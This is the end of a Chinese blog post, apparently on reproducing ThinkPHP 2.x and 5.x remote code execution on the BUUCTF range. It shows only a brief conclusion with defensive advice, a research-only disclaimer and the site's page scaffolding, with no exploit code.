<p>ThinkPHP 2.x 和 5.x 的 RCE 漏洞利用简单但危害极大，攻击者可通过简单的 URL 构造实现代码或命令执行，甚至完全控制服务器。BUUCTF 靶场为我们提供了便捷的复现环境，通过本文的演示，读者可以深入理解漏洞原理和利用流程。开发者应及时升级框架、加强输入验证、部署 WAF 和监控机制，以有效防范此类漏洞。</p>
<blockquote>
<p><strong>免责声明</strong>：本文内容仅供安全研究和防护参考，请勿用于非法攻击活动。</p>
</blockquote>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web%E5%AE%89%E5%85%A8/" class="category-chain-item">Web安全</a>
  
  
    <span>></span>
    
  <a href="/categories/Web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="category-chain-item">漏洞分析</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Web%E5%AE%89%E5%85%A8/" class="print-no-link">#Web安全</a>
      
        <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="print-no-link">#漏洞复现</a>
      
        <a href="/tags/RCE/" class="print-no-link">#RCE</a>
      
        <a href="/tags/ThinkPHP/" class="print-no-link">#ThinkPHP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）</div>
      <div>https://bae-ace.github.io/2025/07/28/ThinkPHP-2-x-5-x-远程代码执行漏洞复现与利用（基于-BUUCTF）/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>bae</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年7月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/29/PHP-XXE-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8E%E5%8E%9F%E7%90%86/" title="PHP XXE 漏洞利用与原理">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PHP XXE 漏洞利用与原理</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/27/ThinkPHP-5-x-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%9F%BA%E4%BA%8E-Vulhub-%E7%8E%AF%E5%A2%83%EF%BC%89/" title="ThinkPHP 5.x 远程代码执行漏洞（基于 Vulhub 环境）">
                        <span class="hidden-mobile">ThinkPHP 5.x 远程代码执行漏洞（基于 Vulhub 环境）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"CHbSLmwKFof8sHkOvlnoDfza-MdYXbMMI","appKey":"lVqIfnWUAiZZLIag2RoSpxoo","serverURLs":"https://chbslmwk.api.lncldglobal.com","placeholder":"留言仅限讨论，禁止广告等行为","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  



  <script>
  Fluid.utils.createScript('https://lib.baomitu.com/mermaid/8.14.0/mermaid.min.js', function() {
    mermaid.initialize({"theme":"default"});

    Fluid.utils.listenDOMLoaded(function() {
      Fluid.events.registerRefreshCallback(function() {
        if ('mermaid' in window) {
          mermaid.init();
        }
      });
    });
  });
</script>






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://bae-ace.github.io" target="_blank" rel="nofollow noopener"><span>github</span></a> <i class="iconfont icon-love"></i> <a href="https://bae-ace.github.io/" target="_blank" rel="nofollow noopener"><span>bae</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/love.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiaoxingxing.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiaoxuehua.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
